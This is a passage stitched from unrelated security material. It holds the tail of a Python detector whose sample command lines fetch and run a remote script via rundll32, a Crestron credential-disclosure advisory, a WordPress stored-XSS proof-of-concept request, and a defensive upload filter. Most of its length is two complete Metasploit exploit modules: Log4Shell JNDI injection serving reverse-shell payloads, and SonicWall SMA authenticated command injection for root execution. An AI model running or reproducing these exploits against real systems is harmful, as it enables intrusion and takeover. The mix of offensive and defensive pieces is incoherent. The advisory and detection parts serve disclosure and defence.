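    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp")',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry /s',
]

# Constructed samples: the advisory's spoofed names plus two ordinary ones.
SAMPLE_REG_NAMES = [
    "Sales_Report_2022.%n%nClick YES to cancel%0.reg",
    "Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg",
    "backup-2022-01.reg",
    "100%_done.reg",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(classify_cmdline(cmd) or "clean", "<-", cmd[:60])
    for name in SAMPLE_REG_NAMES:
        print("SPOOF?" if suspicious_reg_name(name) else "ok    ", name)
```

The point of normalising before matching is that a rule keyed on the literal string "script:http" or on exactly two ..\ hops is what the advisories show being bypassed; matching on the normalised form catches the blocked and the bypassing variant with one rule.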
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::JavaDeserialization<br /> include Msf::Exploit::Java<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::LDAP::Server<br /> include Msf::Exploit::Remote::CheckModule<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(_info = {})<br /> super(<br /> 'Name' => 'Log4Shell HTTP Header Injection',<br /> 'Description' => %q{<br /> Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,<br /> log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.<br /><br /> This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that<br /> will trigger an LDAP connection to Metasploit and load a payload.<br /><br /> The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP<br /> server in addition to the LDAP server that the target can connect to. The targeted application must have the<br /> trusted code base option enabled for this technique to work.<br /><br /> The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to<br /> run an HTTP server and instead leverages the LDAP server to deliver the serialized object. 
The target<br /> application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.<br /> },<br /> 'Author' => [<br /> 'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff<br /> 'juan vazquez', # 2011-3544 building blocks reused in this module<br /> 'sinn3r', # 2011-3544 building blocks reused in this module<br /> 'Spencer McIntyre', # Kickoff on 2021-44228 work, improvements, and polish required for formal acceptance<br /> 'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-44228' ],<br /> ],<br /> 'DisclosureDate' => '2021-12-09',<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'SRVPORT' => 389,<br /> 'WfsDelay' => 30,<br /> 'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'<br /> },<br /> 'Targets' => [<br /> [<br /> 'Automatic', {<br /> 'Platform' => 'java',<br /> 'Arch' => [ARCH_JAVA],<br /> 'RemoteLoad' => true,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'java/shell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows', {<br /> 'Platform' => 'win',<br /> 'RemoteLoad' => false,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'<br /> }<br /> },<br /> ],<br /> [<br /> 'Linux', {<br /> 'Platform' => 'unix',<br /> 'RemoteLoad' => false,<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> },<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'AKA' => ['Log4Shell', 'LogJam'],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]<br /> },<br /> 'Stance' => Msf::Exploit::Stance::Aggressive<br /> )<br /> register_options([<br /> OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),<br /> OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),<br /> 
OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),<br /> OptEnum.new('JAVA_GADGET_CHAIN', [<br /> true, 'The ysoserial payload to use for deserialization', 'CommonsBeanutils1',<br /> Msf::Util::JavaDeserialization.ysoserial_payload_names<br /> ], conditions: %w[TARGET != Automatic]),<br /> OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic]),<br /> OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])<br /> ])<br /> end<br /><br /> def check<br /> validate_configuration!<br /> # set these scanner options as appropriate based on the config<br /> datastore['URIS_FILE'] = nil<br /> if !datastore['HTTP_HEADER'].blank?<br /> datastore['HEADERS_FILE'] = nil<br /> end<br /><br /> @checkcode = super<br /> end<br /><br /> def jndi_string<br /> "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}"<br /> end<br /><br /> def resource_url_string<br /> "http#{datastore['SSL'] ? 
/> 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"<br /> end<br /><br /> #<br /> # Use Ruby Java bridge to create a Java-natively-serialized object<br /> #<br /> # @return [String] Marshalled serialized byteArray of the loader class<br /> def byte_array_payload(pay_class = 'metasploit.PayloadFactory')<br /> jar = generate_payload.encoded_jar<br /> serialized_class_from_jar(jar, pay_class)<br /> end<br /><br /> #<br /> # Insert PayloadFactory in Java payload JAR<br /> #<br /> # @param jar [Rex::Zip::Jar] payload JAR to update<br /> # @return [Rex::Zip::Jar] updated payload JAR<br /> def inject_jar_payload_factory(jar = generate_payload.encoded_jar)<br /> # From exploits/multi/browser/java_rhino - should probably go to lib<br /> paths = [<br /> [ 'metasploit/PayloadFactory.class' ]<br /> ]<br /> paths.each do |path|<br /> 1.upto(path.length - 1) do |idx|<br /> full = path[0, idx].join('/') + '/'<br /> jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)<br /> end<br /> File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|<br /> data = fd.read(fd.stat.size)<br /> jar.add_file(path.join('/'), data)<br /> end<br /> end<br /> jar<br /> end<br /><br /> #<br /> # Generate and serialize the payload as an LDAP search response<br /> #<br /> # @param msg_id [Integer] LDAP message identifier<br /> # @param base_dn [String] LDAP distinguished name<br /> #<br /> # @return [Array] packed BER sequence<br /> def serialized_payload(msg_id, base_dn, pay_class = 'metasploit.PayloadFactory')<br /> if target['RemoteLoad']<br /> attrs = [<br /> [ 'javaClassName'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,<br /> [ 'javaFactory'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,<br /> [ 'objectClass'.to_ber, [ 'javaNamingReference'.to_ber ].to_ber_set ].to_ber_sequence,<br /> [ 'javaCodebase'.to_ber, [ resource_url_string.to_ber ].to_ber_set ].to_ber_sequence,<br /> ]<br /> else<br
/> java_payload = generate_java_deserialization_for_payload(datastore['JAVA_GADGET_CHAIN'], payload)<br /> # vprint_good("Serialized java payload: #{java_payload}")<br /> attrs = [<br /> [ 'javaClassName'.to_ber, [ rand_text_alphanumeric(8..15).to_ber ].to_ber_set ].to_ber_sequence,<br /> [ 'javaSerializedData'.to_ber, [ java_payload.to_ber ].to_ber_set ].to_ber_sequence<br /> ]<br /> end<br /> appseq = [<br /> base_dn.to_ber,<br /> attrs.to_ber_sequence<br /> ].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)<br /> [ msg_id.to_ber, appseq ].to_ber_sequence<br /> end<br /><br /> ## LDAP service callbacks<br /> #<br /> # Handle incoming requests via service mixin<br /> #<br /> def on_dispatch_request(client, data)<br /> return if data.strip.empty?<br /><br /> data.extend(Net::BER::Extensions::String)<br /> begin<br /> pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))<br /> vprint_status("LDAP request data remaining: #{data}") unless data.empty?<br /> resp = case pdu.app_tag<br /> when Net::LDAP::PDU::BindRequest # bind request<br /> client.authenticated = true<br /> service.encode_ldap_response(<br /> pdu.message_id,<br /> Net::LDAP::ResultCodeSuccess,<br /> '',<br /> '',<br /> Net::LDAP::PDU::BindResult<br /> )<br /> when Net::LDAP::PDU::SearchRequest # search request<br /> if client.authenticated || datastore['LDAP_AUTH_BYPASS']<br /> client.write(serialized_payload(pdu.message_id, pdu.search_parameters[:base_object]))<br /> service.encode_ldap_response(pdu.message_id, Net::LDAP::ResultCodeSuccess, '', 'Search success', Net::LDAP::PDU::SearchResult)<br /> else<br /> service.encode_ldap_response(pdu.message_id, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)<br /> end<br /> else<br /> vprint_status("Client sent unexpected request #{pdu.app_tag}")<br /> client.close<br /> end<br /> resp.nil? ? 
client.close : on_send_response(client, resp)<br /> rescue StandardError => e<br /> print_error("Failed to handle LDAP request due to #{e}")<br /> client.close<br /> end<br /> resp<br /> end<br /><br /> ## HTTP service callbacks<br /> #<br /> # Handle HTTP requests and responses<br /> #<br /> def on_request_uri(cli, request)<br /> agent = request.headers['User-Agent']<br /> vprint_good("Payload requested by #{cli.peerhost} using #{agent}")<br /> pay = regenerate_payload(cli)<br /> jar = inject_jar_payload_factory(pay.encoded_jar)<br /> send_response(cli, 200, 'OK', jar)<br /> end<br /><br /> #<br /> # Create an HTTP response and then send it<br /> #<br /> def send_response(cli, code, message = 'OK', html = '')<br /> proto = Rex::Proto::Http::DefaultProtocol<br /> res = Rex::Proto::Http::Response.new(code, message, proto)<br /> res['Content-Type'] = 'application/java-archive'<br /> res.body = html<br /> cli.send_response(res)<br /> end<br /><br /> def exploit<br /> validate_configuration!<br /> if datastore['HTTP_HEADER'].blank?<br /> targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first<br /> http_header = targetinfo[:headers].keys.first if targetinfo<br /> fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header<br /><br /> print_good("Automatically identified vulnerable header: #{http_header}")<br /> else<br /> http_header = datastore['HTTP_HEADER']<br /> end<br /><br /> # LDAP service<br /> start_service<br /> # HTTP service<br /> start_http_service if target['RemoteLoad']<br /> # HTTP request initiator<br /> send_request_raw(<br /> 'uri' => normalize_uri(target_uri),<br /> 'method' => datastore['HTTP_METHOD'],<br /> 'headers' => { http_header => jndi_string }<br /> )<br /> sleep(datastore['WfsDelay'])<br /> handler<br /> ensure<br /> cleanup<br /> end<br /><br /> #<br /> # Kill HTTP & LDAP services (shut them down and clear resources)<br /> #<br /> def cleanup<br /> # Clean and stop HTTP server<br /> if @http_service<br /> begin<br /> @http_service.remove_resource(datastore['URIPATH'])<br /> @http_service.deref<br /> @http_service.stop<br /> @http_service = nil<br /> rescue StandardError => e<br /> print_error("Failed to stop http server due to #{e}")<br /> end<br /> end<br /> super<br /> end<br /><br /> private<br /><br /> # Boilerplate HTTP service code<br /> #<br /> # Returns the configured (or random, if not configured) URI path<br /> #<br /> def resource_uri<br /> path = datastore['URIPATH'] || rand_text_alphanumeric(rand(8..15)) + '.jar'<br /> path = '/' + path if path !~ %r{^/}<br /> if path !~ /\.jar$/<br /> print_status("Appending .jar extension to #{path} as we don't yet serve classpaths")<br /> path += '.jar'<br /> end<br /> datastore['URIPATH'] = path<br /> return path<br /> end<br /><br /> #<br /> # Handle the HTTP request and return a response. Code borrowed from:<br /> # msf/core/exploit/http/server.rb<br /> #<br /> def start_http_service(opts = {})<br /> comm = datastore['ListenerComm']<br /> if (comm.to_s == 'local')<br /> comm = ::Rex::Socket::Comm::Local<br /> else<br /> comm = nil<br /> end<br /> # Default the server host / port<br /> opts = {<br /> 'ServerHost' => datastore['SRVHOST'],<br /> 'ServerPort' => datastore['HTTP_SRVPORT'],<br /> 'Comm' => comm<br /> }.update(opts)<br /> # Start a new HTTP server<br /> @http_service = Rex::ServiceManager.start(<br /> Rex::Proto::Http::Server,<br /> opts['ServerPort'].to_i,<br /> opts['ServerHost'],<br /> datastore['SSL'],<br /> {<br /> 'Msf' => framework,<br /> 'MsfExploit' => self<br /> },<br /> opts['Comm'],<br /> datastore['SSLCert']<br /> )<br /> @http_service.server_name = datastore['HTTP::server_name']<br /> # Default the procedure of the URI to on_request_uri if one isn't<br /> # provided.<br /> uopts = {<br /> 'Proc' => method(:on_request_uri),<br /> 'Path' => resource_uri<br /> }.update(opts['Uri'] || {})<br /> proto = (datastore['SSL'] ? 'https' : 'http')<br /> print_status("Serving Java code on: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")<br /> if (opts['ServerHost'] == '0.0.0.0')<br /> print_status(" Local IP: #{proto}://#{Rex::Socket.source_address}:#{opts['ServerPort']}#{uopts['Path']}")<br /> end<br /> # Add path to resource<br /> @service_path = uopts['Path']<br /> @http_service.add_resource(uopts['Path'], uopts)<br /> end<br /><br /> def validate_configuration!<br /> fail_with(Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') if ['0.0.0.0', '::'].include?(datastore['SRVHOST'])<br /> if datastore['HTTP_HEADER'].blank? && !datastore['AutoCheck']<br /> fail_with(Failure::BadConfig, 'Either the AutoCheck option must be enabled or an HTTP_HEADER must be specified.')<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Advisory: Credential Disclosure in Web Interface of Crestron Device<br /><br /><br />When the administrative web interface of the Crestron HDMI switcher is<br />accessed without authentication, user credentials are disclosed that<br />are valid for authenticating to the web interface.<br /><br />Details<br />=======<br /><br />Product: Crestron HD-MD4X2-4K-E<br />Affected Versions: 1.0.0.2159<br />Fixed Versions: -<br />Vulnerability Type: Information Disclosure<br />Security Risk: high<br />Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E<br />Vendor Status: decided not to fix<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009<br />Advisory Status: published<br />CVE: CVE-2022-23178<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178<br /><br /><br />Introduction<br />============<br /><br />"Crestron sets the gold standard for network security by leveraging the<br />most advanced technologies including 802.1x authentication, AES<br />encryption, Active Directory® credential management, JITC Certification,<br />SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to<br />provide network security at the product level."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />Upon visiting the device's web interface with a web browser, a login<br />form is displayed that requires a username and password to<br />authenticate. Analysis of the HTTP traffic revealed that, in addition<br />to loading the page itself, a few more HTTP requests are triggered<br />automatically. One of the associated responses contains a username and<br />a password which can be used to authenticate as the affected user.<br /><br /><br />Proof of Concept<br />================<br /><br />Requesting the URL "http://crestron.example.com/" via a web browser<br />results in multiple HTTP requests being sent. Among others, the<br />following URL is requested:<br /><br />------------------------------------------------------------------------<br />http://crestron.example.com/aj.html?a=devi&_=[...]<br />------------------------------------------------------------------------<br /><br />This request results in a response similar to the following:<br /><br />------------------------------------------------------------------------<br />HTTP/1.0 200 OK<br />Cache-Control: no-cache<br />Content-type: text/html<br /><br />{<br /> "login_ur": 0,<br /> "front_val": [<br /> 0,<br /> 1<br /> ],<br /> "uname": "admin",<br /> "upassword": "password"<br />}<br />------------------------------------------------------------------------<br /><br />The values for the keys "uname" and "upassword" could be used to<br />successfully authenticate to the web interface as the affected user.<br /><br /><br />Workaround<br />==========<br /><br />Network access to the web interface can be restricted, for example by<br />using a firewall.<br /><br /><br />Fix<br />===<br /><br />No fix known.<br /><br /><br />Security Risk<br />=============<br /><br />As user credentials are disclosed to any visitor of the web interface,<br />they can be used directly to authenticate to it. This access allows<br />modifying the device's input and output settings as well as uploading<br />and installing new firmware. Due to the ease of exploitation and the<br />administrative access gained, this vulnerability poses a high risk.<br /><br /><br />Timeline<br />========<br /><br />2021-10-06 Vulnerability identified<br />2021-11-15 Customer approved disclosure to vendor<br />2021-12-08 Vendor notified<br />2021-12-15 Vendor notified again<br />2021-12-21 Vendor response received: "The device in question doesn't support<br /> Crestron's security practices. We recommend the HD-MD-4KZ alternative."<br />2021-12-22 Requested confirmation that the vulnerability will not be addressed.<br />2021-12-28 Vendor confirms that the vulnerability will not be corrected.<br />2022-01-12 Advisory released<br /><br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. In this way, security<br />weaknesses in company networks or products are uncovered and can be<br />fixed immediately.<br /><br />As there are only a few experts in this field, RedTeam Pentesting wants<br />to share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)<br /># Date: 10/01/2022<br /># Exploit Author: Veshraj Ghimire<br /># Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/<br /># Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/<br /># Version: 1.3.2<br /># Tested on: Windows 10 - Chrome, WordPress 5.8.2<br /># CVE : CVE-2021-24563<br /><br /># References:<br /><br />https://www.youtube.com/watch?v=lfrLoHl4-Zs<br />https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1<br /><br /># Description:<br /><br />The plugin does not prevent HTML files from being uploaded via its form, allowing an unauthenticated user to upload a malicious HTML file (for example, one containing JavaScript), which is executed when someone accesses the file directly.<br /><br /><br /># Proof Of Concept:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-GB,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654<br />Content-Length: 1396<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="post_ID"<br /><br />1247<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="post_title"<br /><br />test<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="post_content"<br /><br />test<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="files[]"; filename="xss.html"<br />Content-Type: text/html<br /><br /><script>alert(/XSS/)</script><br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="action"<br /><br />upload_ugc<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="form_layout"<br /><br />image<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="fu_nonce"<br /><br />021fb612f9<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="_wp_http_referer"<br /><br />/wordpress/frontend-uploader-form/<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="ff"<br /><br />92b6cbfa6120e13ff1654e28cef2a271<br />-----------------------------124662954015823207281179831654<br />Content-Disposition: form-data; name="form_post_id"<br /><br />1247<br />-----------------------------124662954015823207281179831654--<br /><br />Then access the uploaded file to trigger the XSS, e.g. https://example.com/wp-content/uploads/2021/07/xss.html<br /></code></pre>
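A server-side upload filter for the weakness in the PoC above, added here as an example (it is not the plugin's code and not part of the PoC). It parses the multipart body, constructed here from the PoC's file part plus a benign image part, and rejects any file part whose extension is not on an allowlist, whose declared Content-Type does not match that extension, or whose body contains active markup; the allowlist and the ACTIVE_CONTENT heuristic are assumptions about what a site needs.

```python
import email
import email.policy
import os
import re

# Allowlist for files served straight out of wp-content/uploads. HTML, SVG and JS
# are deliberately absent: browsers execute them when opened directly, which is
# exactly what the PoC above relies on. (Assumption: the types this site needs.)
ALLOWED_TYPES = {".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".png": "image/png",
                 ".gif": "image/gif", ".pdf": "application/pdf"}

# Markup that makes a file active content whatever its extension, e.g. an
# "image" that is really <svg onload=...>. Heuristic sniffing, not a full parser.
ACTIVE_CONTENT = re.compile(rb"<\s*(script|iframe|object|embed|svg|meta)\b|javascript:|\bon\w+\s*=", re.I)


def check_upload(filename, content_type, data):
    """Return (accepted, reason) for a single uploaded file part."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base in ("", ".", ".."):
        return False, "path component in filename"
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} not in allowlist"
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != ALLOWED_TYPES[ext]:
        return False, f"declared type {declared} does not match {ext}"
    if ACTIVE_CONTENT.search(data):
        return False, "active content in file body"
    return True, "ok"


def check_multipart_request(content_type_header, body):
    """Parse a multipart/form-data body and check every part carrying a filename."""
    raw = b"Content-Type: " + content_type_header.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw, policy=email.policy.HTTP)
    results = {}
    for part in msg.iter_parts():
        fname = part.get_filename()
        if fname is None:
            continue  # plain form field such as post_title or fu_nonce
        results[fname] = check_upload(fname, part.get_content_type(),
                                      part.get_payload(decode=True))
    return results


# Constructed sample body: the file part from the PoC above plus a benign PNG part.
BOUNDARY = "---------------------------124662954015823207281179831654"
DELIM = b"--" + BOUNDARY.encode()
SAMPLE_BODY = b"\r\n".join([
    DELIM, b'Content-Disposition: form-data; name="post_title"', b"", b"test",
    DELIM, b'Content-Disposition: form-data; name="files[]"; filename="xss.html"',
    b"Content-Type: text/html", b"", b"<script>alert(/XSS/)</script>",
    DELIM, b'Content-Disposition: form-data; name="files[]"; filename="cat.png"',
    b"Content-Type: image/png", b"", b"\x89PNG\r\n\x1a\n(constructed image bytes)",
    DELIM + b"--", b"",
])

if __name__ == "__main__":
    for name, (ok, why) in check_multipart_request(
            f"multipart/form-data; boundary={BOUNDARY}", SAMPLE_BODY).items():
        print(f"{name}: {'accept' if ok else 'reject'} ({why})")
```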
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an authenticated command injection vulnerability<br /> in the SonicWall SMA 100 series web interface. Exploitation results in<br /> command execution as root. The affected versions are:<br /><br /> - 10.2.1.2-24sv and below<br /> - 10.2.0.8-37sv and below<br /> - 9.0.0.11-31sv and below<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Vulnerability discovery and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-20039' ],<br /> [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'],<br /> [ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis']<br /> ],<br /> 'DisclosureDate' => '2021-12-14',<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X86],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'echo', 'printf' ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'PrependFork' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),<br /> OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),<br /> OptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']),<br /> OptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice'])<br /> ])<br /> end<br /><br /> ##<br /> # Extract the version number from a JavaScript include in the login landing page<br /> # and compare it against the known affected versions, which are:<br /> #<br /> # 10.2.1.2-24sv and below<br /> # 10.2.0.8-37sv and below<br /> # 9.0.0.11-31sv and below<br /> ##<br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),<br /> 'agent' => 'SonicWALL Mobile Connect'<br /> })<br /> return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200<br /><br /> version = res.body.match(/\.([0-9.\-a-z]+)\.js" type=/)<br /> return CheckCode::Unknown('Failed to retrieve the version information') unless version<br /><br /> version = version[1]<br /><br /> major, minor, revision, build = version.split('.', 4)<br /> build, point = build.split('-', 2)<br /> print_status("Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}")<br /> # Strip the trailing "sv" so the point release compares numerically; to_s guards<br /> # against a version string without a "-" suffix, where point would be nil.<br /> point = point.to_s.delete_suffix('sv')<br /><br /> case major<br /> when '9'<br /> return CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31<br /> when '10'<br /> return CheckCode::Safe unless minor.to_i == 2<br /><br /> case revision<br /> when '0'<br /> return CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37<br /> when '1'<br /> return CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24<br /> else<br /> return CheckCode::Safe<br /> end<br /> else<br /> return CheckCode::Safe<br /> end<br /> CheckCode::Appears('Based on the discovered version.')<br /> end<br /><br /> def login<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'),<br /> 'agent' => 'SonicWALL Mobile Connect',<br /> 'vars_post' =><br /> {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'domain' => datastore['SWDOMAIN'],<br /> 'portalname' => datastore['PORTALNAME'],<br /> 'login' => 'true',<br /> 'verifyCert' => '0',<br /> 'ajax' => 'true'<br /> },<br /> 'keep_cookies' => true<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200<br /> fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')<br /> print_good('Authentication successful')<br /> end<br /><br /> ##<br /> # Send the exploit in the "CERT" field when "deleting" a certificate. The<br /> # backend requires that the payload start with "n". Also, there is a very small<br /> # amount of space to fit the command into (otherwise we'll trigger a bof).<br /> # Finally! The command has a lot of disallowed characters: /$&|>;`^, which<br /> # is a problem for basically all the payloads. The system is also<br /> # missing useful tools like wget, base64, and curl (10.2 has curl but<br /> # whatever). As such, the easiest approach is to wrap the entire<br /> # command in base64 and then use perl to decode and execute it.<br /> ##<br /> def execute_command(cmd, _opts = {})<br /> cmd_encoded = Rex::Text.encode_base64(cmd)<br /> perl_eval = "n\nperl -MMIME::Base64 -e 'system(decode_base64(\"#{cmd_encoded}\"))'"<br /><br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part('delete', nil, nil, 'form-data; name="buttontype"')<br /> multipart_form.add_part(perl_eval, nil, nil, 'form-data; name="CERT"')<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'),<br /> 'agent' => 'SonicWALL Mobile Connect',<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'data' => multipart_form.to_s<br /> }, 5)<br /><br /> if res && res.code != 200<br /> # the response should always be 200, unless meterpreter holds the<br /> # connection open.<br /> fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> login<br /> execute_cmdstager(linemax: 40)<br /> end<br />end<br /></code></pre>
